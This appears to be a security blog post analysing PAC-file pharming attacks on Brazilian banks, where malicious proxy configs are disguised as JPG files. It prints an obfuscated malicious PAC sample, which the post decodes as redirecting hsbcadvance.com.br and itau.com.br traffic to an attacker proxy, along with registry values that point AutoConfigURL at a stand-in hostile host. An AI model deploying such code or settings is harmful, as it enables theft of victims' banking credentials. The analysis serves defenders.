JPG Encrypted PAC - A new Favorite for Pharmers


The man-in-the-middle attack using PAC (Proxy Auto-Config) files is a fraud technique widely used by Brazilian criminals to take control of the HTTP traffic of an infected machine and redirect it to a proxy the attacker owns.

Normally a PAC file is configured in the browser to "instruct" it which proxy to use for a given URL. The attack is similar to "pharming", where the local hosts file or DNS is tampered with so that URLs resolve to hostile IP addresses. PAC support is built into every web browser as a feature that gives corporate IT the flexibility to steer clients to specific network egress proxies. Unfortunately, PAC has become a new favourite pharming technique, primarily because it is harder to detect than hosts-file or DNS tampering while offering attackers the same flexibility and configurability.


The content of these files is plain text (viewable in any text editor) and defines at least one JavaScript function, FindProxyForURL, which the browser calls for each request to obtain the proxy to use:

function FindProxyForURL(url, host) {
    // send traffic for the matching host through the attacker's proxy,
    // falling back to a direct connection if that proxy is unreachable
    if (shExpMatch(host, "www.gmail.com")) {
        return "PROXY 192.168.1.102:80; DIRECT";
    }
    return "DIRECT";
}

Attackers typically use malware to change the PAC setting of the target browser. The malware can point the browser either at a PAC file hosted online or at one dropped in a local folder on the machine. On Windows this is done by writing the AutoConfigURL value in the registry, for example:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, AutoConfigURL = http://www.badsite.com/pacscript.pac
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, AutoConfigURL = file://C:/WINDOWS/proxy.pac

Some antivirus engines have started blocking these PAC URLs, so attackers keep evolving the way they set up the attack, most recently by obfuscating the script itself.
In recent months a new PAC technique has emerged: proxy configuration code embedded in JPG files. JPG is of course a very common image format, and one not widely scrutinized by antivirus technology.

These "images" are not formatted according to the JPEG specification at all; the file simply contains the plain-text JavaScript of a properly formed PAC routine, and the .jpg extension is the disguise.
Here is one example of a PAC routine disguised as a JPG file:

function FindProxyForURL(url, host)
{mpqre0=0;mpqre1=1;mpqre2=2;mpqre3=3;mpqre4=4;mpqre5=5;mpqre6=6;
mpqre7=7;mpqre8=8;mpqre9=9;mpqrevazio="";mpqrep=".";oqmsr="P";wrhnq="R";
ghdcr="O";vcawf="X";bbsgje="Y";

feliznatal=mpqrevazio+mpqre1+mpqre9+mpqre9+mpqrep+mpqre1+mpqre9+
mpqre3+mpqrep+mpqre2+mpqre5+mpqre2+mpqrep+mpqre1+mpqre5+mpqre9;

mpqrea="a";mpqreb="b";mpqrec="c";mpqred="d";mpqree="e";mpqref="f";
mpqreg="g";mpqreh="h";mpqrei="i";mpqrej="j";mpqrek="k";mpqrel="l";
mpqrem="m";mpqren="n";mpqreo="o";mpqrepp="p";mpqreq="q";mpqrer="r";
mpqres="s";mpqret="t";mpqreu="u";mpqrev="v";mpqrew="w";mpqrex="x";
mpqrey="y";mpqrez="z";

if (shExpMatch(host, mpqreh+mpqres+mpqreb+mpqrec+mpqrea+mpqred+mpqrev+mpqrea+mpqren+
mpqrec+mpqree+mpqrep+mpqrec+mpqreo+mpqrem+mpqrep+mpqreb+mpqrer))
{return oqmsr+wrhnq+ghdcr+vcawf+bbsgje+feliznatal;}

if (shExpMatch(host, mpqrei+mpqret+mpqrea+mpqreu+mpqrep+mpqrec+mpqreo+mpqrem+mpqrep+
mpqreb+mpqrer)){return oqmsr+wrhnq+ghdcr+vcawf+bbsgje+feliznatal;}
}

In this case the attack adds a layer of JavaScript obfuscation (string building rather than real encryption) to disguise the content and structure of the PAC routine: every character is assigned to its own variable, and the hostnames and proxy address are concatenated at run time. Once recognized, the code is easily decoded. It is examined below in sections.

The first block defines the encoded characters that are used in the rest of the code: one variable per digit (held as a number) and, further down, one variable per letter.

Next, the variable "feliznatal" is defined; it holds the proxy the browser is going to use. Concatenating the numeric digit variables onto the empty string "mpqrevazio" turns them into text, so after decoding the value of "feliznatal" is 199.193.252.159.

The configuration itself is done in the final block, where the variables set in the first sections are used. Decoded, the first condition reads:

if (shExpMatch(host, "hsbcadvance.com.br"))
{return "PROXY 199.193.252.159";}

This JavaScript configures the browser to send HTTP traffic for the host hsbcadvance.com.br through the proxy 199.193.252.159; the second condition in the sample does the same for itau.com.br.

The attacker controls that proxy and serves a fake page that asks for credentials. Victims see the bank's URL in the address bar and are unaware of the redirection.

This technique has been adopted by criminals in Latin America to keep more control and flexibility over their attacks. Because it is new and still relatively unknown to hosting providers, attackers rely on it to keep their malicious proxies online longer and reach more victims. As with many web-based attacks that emerge from Latin America, we expect to see more PAC attacks globally in 2014.
